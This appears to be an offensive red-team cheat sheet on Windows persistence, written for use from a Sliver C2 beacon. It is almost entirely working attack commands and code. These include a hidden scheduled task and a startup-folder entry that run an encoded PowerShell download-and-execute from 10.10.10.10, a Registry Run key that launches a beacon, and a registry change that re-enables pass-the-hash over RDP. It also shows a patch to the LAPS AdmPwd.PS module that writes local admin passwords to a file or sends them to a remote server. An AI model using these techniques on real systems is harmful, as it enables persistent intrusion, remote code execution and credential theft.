Persistence
Persistence on Windows
The commands that include execute-assembly
have been executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes.
- Task scheduler
$str = 'IEX ((new-object net.webclient).downloadstring("http://10.10.10.10/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
execute-assembly -i -E SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64_STRING" -n "Updater" -m add -o hourly
- Startup folder
execute-assembly -i -E SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64_STRING" -f "UserEnvSetup" -m add
- Registry AutoRun
execute-assembly -i -E SharPersist.exe -t reg -c "C:\ProgramData\becaon.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
- Background powershell task
Start-Process -FilePath ".\file.exe" -ArgumentList "10.10.10.10 9001" -NoNewWindow
- Disable PTH restrictions on RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
- LAPS Backdoor with AdmPws.PS
// Main/AdmPwd.PS/Main.cs
PasswordInfo pi = DirectoryUtils.GetPasswordInfo(dn);
var line = $"{pi.ComputerName} : {pi.Password}";
System.IO.File.AppendAllText(@"C:\Temp\LAPS.txt", line);
WriteObject(pi);
// or make it call back to a server
using System.Net;
...
using (var client = new WebClient())
{
client.BaseAddress = "http://10.10.10.10";
try
{
client.DownloadString($"?computer={passwordInfo.Computername}&pass={passwordInfo.Password}");
}
catch
{
// pass
}
}